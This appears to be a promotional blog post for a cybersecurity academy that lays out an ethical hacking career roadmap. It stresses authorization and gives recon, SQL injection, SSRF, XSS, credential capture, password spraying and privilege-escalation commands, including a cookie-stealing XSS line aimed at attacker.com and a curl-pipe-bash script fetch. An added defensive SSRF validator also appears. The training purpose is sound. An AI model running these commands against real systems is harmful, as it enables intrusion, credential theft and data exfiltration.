Ethical hacking is not a hobby you pick up over a weekend. It is a discipline built on deep technical knowledge, methodical thinking, and a clear understanding of boundaries. Whether you are a developer curious about offensive security, a sysadmin who wants to understand what attackers actually do, or someone considering a career in penetration testing, this guide gives you a practical, no-nonsense roadmap.
The term "ethical hacking" gets thrown around loosely, but in professional practice it refers to authorized, structured attempts to compromise systems, applications, or networks in order to identify vulnerabilities before malicious actors do. The operative word is authorized. Without explicit written permission from the system owner, every technique described in this post is illegal.
Ethical hackers, also called penetration testers or red teamers, operate under a defined scope. That scope is agreed upon in a Rules of Engagement (RoE) document before a single packet is sent. Violating scope, even accidentally, can end careers and result in prosecution.
The three pillars of ethical hacking work are:
If you want to build a career in this field, understanding the legal and ethical framework is just as important as understanding TCP/IP.
You cannot exploit what you do not understand. A working knowledge of the OSI model, TCP/IP stack, DNS, ARP, HTTP/S, and common port behaviors is non-negotiable. You should be able to read a packet capture in Wireshark and understand what is happening at each layer.
Know these by heart:
Professional penetration testers live in the terminal. Kali Linux and Parrot OS are the standard distributions, but the tools matter less than the fluency. You should be comfortable navigating the filesystem, managing permissions, writing Bash one-liners, and automating repetitive recon tasks with Python.
Here is a simple Python script that performs a basic TCP connect scan using the standard socket module, the kind of foundational exercise every learner should build before reaching for automated tools:
import socket
import sys

# Usage: python3 scan.py <target>
# Performs a TCP connect scan of ports 1-1024 against a single host.
if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} <target>")

target = sys.argv[1]
ports = range(1, 1025)

print(f"Scanning {target}...")
for port in ports:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(0.5)
    # connect_ex returns an error code instead of raising; 0 means the handshake completed
    result = sock.connect_ex((target, port))
    if result == 0:
        print(f"Port {port}: OPEN")
    sock.close()
Building tools from scratch teaches you what commercial scanners do under the hood. Once you understand it at the socket level, you will use Nmap with far more precision.
The majority of penetration testing engagements today involve web applications. You need a solid grasp of the OWASP Top 10, including SQL injection, broken authentication, IDOR, SSRF, and XSS. More importantly, you need to understand why these vulnerabilities exist at the code level, not just how to detect them with a scanner.
If you are serious about advancing your hands-on skills, the structured learning paths at Redfox Cybersecurity Academy cover web application testing from first principles through advanced exploitation techniques.
Understanding how Windows and Linux manage processes, memory, file permissions, and user privileges is critical for post-exploitation work. Privilege escalation, for example, almost always involves abusing a misconfiguration or unpatched vulnerability in the OS layer.
On Windows, you should understand:
On Linux, you should understand:
Professional penetration testers do not just fire up tools randomly. They follow a structured methodology. Most align with one of these frameworks: PTES (Penetration Testing Execution Standard), OWASP Testing Guide, or NIST SP 800-115.
The phases typically look like this:
1. Reconnaissance
2. Scanning and Enumeration
3. Exploitation
4. Post-Exploitation
5. Reporting
Each phase builds on the last. Sloppy recon leads to missed attack surface. Missed attack surface means incomplete findings. Incomplete findings mean the client's environment is not actually secure after your engagement.
Passive recon means gathering information without touching the target's infrastructure. This is where you learn the most without exposing yourself.
Key passive recon techniques and tools include:
WHOIS and DNS enumeration:
whois targetdomain.com
dig targetdomain.com any
dnsx -d targetdomain.com -a -aaaa -cname -mx -ns -txt -resp
Subdomain discovery with Subfinder and Amass:
subfinder -d targetdomain.com -all -recursive -o subdomains.txt
amass enum -passive -d targetdomain.com -o amass_output.txt
Certificate transparency log searching:
Certificate transparency logs are a goldmine for subdomain discovery. Tools like crt.sh and tlsx query these logs without generating any traffic toward the target.
curl -s "https://crt.sh/?q=%.targetdomain.com&output=json" | jq '.[].name_value' | sort -u
Google dorks for exposed assets:
site:targetdomain.com filetype:env
site:targetdomain.com inurl:admin
site:targetdomain.com ext:sql OR ext:bak OR ext:log
This kind of OSINT work often reveals staging environments, forgotten admin panels, and leaked configuration files before a single port scan is run.
Once you have passive intelligence and authorization to proceed, active recon begins. Nmap remains the industry standard for host discovery and service fingerprinting.
# Host discovery
nmap -sn 192.168.1.0/24
# Full TCP SYN scan with service/version detection and default scripts
nmap -sS -sV -sC -p- --min-rate 5000 -oA full_scan 192.168.1.100
# UDP scan for common services
nmap -sU -p 53,67,68,123,161,500 192.168.1.100
For web applications, ffuf is the go-to tool for directory and parameter fuzzing:
# Directory brute-force
ffuf -u https://targetdomain.com/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200,301,302,403
# Virtual host discovery
ffuf -u https://targetdomain.com/ -H "Host: FUZZ.targetdomain.com" -w subdomains.txt -mc 200
If you want to move from learner to practitioner on exactly these techniques, Redfox Cybersecurity Academy offers hands-on labs where you apply recon methodology against realistic target environments.
SQL Injection with SQLMap:
When you have confirmed a SQL injection point manually (always confirm manually first), SQLMap can automate extraction efficiently:
# Basic GET parameter injection test
sqlmap -u "https://target.com/page?id=1" --dbs --batch
# POST request injection with request file
sqlmap -r request.txt --level=5 --risk=3 --dbs --batch
# Extract specific table data
sqlmap -u "https://target.com/page?id=1" -D targetdb -T users --dump --batch
Testing for SSRF:
Server-Side Request Forgery is consistently one of the most impactful vulnerabilities in modern cloud environments. A manual test using Burp Collaborator or interactsh:
# Start an interactsh listener
interactsh-client
# Inject the generated URL into a vulnerable parameter
curl -s "https://target.com/fetch?url=https://YOUR-INTERACTSH-ID.oast.fun"
When the interactsh server receives a DNS or HTTP callback, SSRF is confirmed. From there, attackers can often pivot to internal services, cloud metadata endpoints (such as http://169.254.169.254/latest/meta-data/ in AWS), or internal APIs.
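The defensive counterpart, as an added example that is not part of the original post: validating a user-supplied fetch URL before the server requests it, so that loopback, private and link-local destinations such as the metadata endpoint above are refused. The DNS table, the hostnames and the 8.8.8.8 placeholder are constructed; a real service would resolve with socket.getaddrinfo and then connect to the validated address.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS table so the example runs offline (assumption). In production,
# resolve with socket.getaddrinfo() and validate every address it returns.
FAKE_DNS = {
    "api.example.com": ["8.8.8.8"],               # placeholder for a public address
    "intranet.example.com": ["10.0.0.5"],
    "metadata.example.org": ["169.254.169.254"],  # name repointed at the AWS metadata IP
}

def resolve(host):
    try:
        return [str(ipaddress.ip_address(host))]  # literal IP: nothing to look up
    except ValueError:
        return FAKE_DNS.get(host, [])

def is_public_address(addr):
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def is_safe_target(url):
    """Return (ok, reason, resolved_ip). Connect to resolved_ip, not to the
    name again: a second lookup reopens the DNS-rebinding window."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed", None
    if not parts.hostname:
        return False, "no host", None
    if parts.username or parts.password:
        return False, "userinfo not allowed", None  # e.g. http://api.example.com@10.0.0.5/
    addrs = resolve(parts.hostname)
    if not addrs:
        return False, "host did not resolve", None
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"resolves to non-public address {addr}", None
    return True, "ok", addrs[0]

if __name__ == "__main__":
    for u in ("https://api.example.com/v1/report",
              "http://169.254.169.254/latest/meta-data/",
              "http://metadata.example.org/",
              "http://127.0.0.1:8080/admin",
              "file:///etc/passwd"):
        print(u, "->", is_safe_target(u)[:2])
```

A deployed check also has to re-validate every HTTP redirect hop and handle alternative address encodings (decimal or octal IPv4, IPv4-mapped IPv6), which the resolver step catches only once the name has actually been looked up.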
XSS with manual payload construction:
Automated scanners miss a huge proportion of XSS. Learning to construct and encode payloads manually is a core skill:
<!-- Basic reflected XSS test -->
<script>alert(document.domain)</script>
<!-- CSP bypass attempt using JSONP endpoint -->
<script src="https://accounts.google.com/o/oauth2/revoke?token=1"></script>
<!-- DOM XSS via innerHTML sink -->
<img src=x onerror=fetch(`https://attacker.com/?c=${document.cookie}`)>
Responder for credential capture on internal networks:
On authorized internal network assessments, Responder poisons LLMNR, NBT-NS, and mDNS to capture NTLMv2 hashes:
sudo responder -I eth0 -dwv
Captured hashes can then be cracked offline with Hashcat:
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt --force
CrackMapExec for network lateral movement testing:
# Check SMB signing and authentication across a subnet
crackmapexec smb 192.168.1.0/24
# Password spray against a domain
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Execute a command on an authenticated target
crackmapexec smb 192.168.1.100 -u admin -p 'password' -x "whoami /all"
This is exactly the kind of tooling covered in depth at Redfox Cybersecurity Academy, where labs simulate real enterprise Active Directory environments.
Post-exploitation is where engagements differentiate themselves. Finding a foothold is one thing. Demonstrating impact through privilege escalation and lateral movement is what makes a penetration test meaningful to a client.
LinPEAS is the standard automated enumeration script for Linux post-exploitation:
curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
It checks for SUID binaries, writable cron jobs, kernel exploits, weak sudo rules, and dozens of other misconfigurations. But never rely on automation alone. Manual checks matter:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# List sudo rules for current user
sudo -l
# Check for writable cron jobs
ls -la /etc/cron* /var/spool/cron/
cat /etc/crontab
WinPEAS performs the equivalent function on Windows targets:
.\winPEASx64.exe
For token impersonation and privilege abuse, PrintSpoofer and GodPotato are modern alternatives to the older potato family of exploits:
.\PrintSpoofer64.exe -i -c cmd
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
Understanding why these tools work, specifically how Windows handles token impersonation and SeImpersonatePrivilege, is what separates a practitioner from someone who just runs scripts.
Technical skills are learnable. Mindset is harder to teach.
The best ethical hackers share a few consistent traits:
You do not need expensive hardware to start practicing. A basic home lab for ethical hacking can run on a single machine with 16GB of RAM using virtualization:
# Clone and set up Game of Active Directory
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
pip3 install -r requirements.txt --break-system-packages
Practicing in controlled lab environments is the fastest path to building real competency before you ever run a commercial engagement.
Ethical hacking is a career path built on technical depth, professional discipline, and continuous growth. The skills that matter most are not which tools you know how to launch. They are whether you understand what those tools are doing, whether you can work within defined boundaries, and whether you can communicate your findings clearly to people who may not be technical.
Redfox Cybersecurity Academy exists to bridge the gap between theoretical knowledge and hands-on professional skill. If you are ready to move from reading about these techniques to actually practicing them in structured, realistic lab environments, start here and build the skills that the security industry actually needs.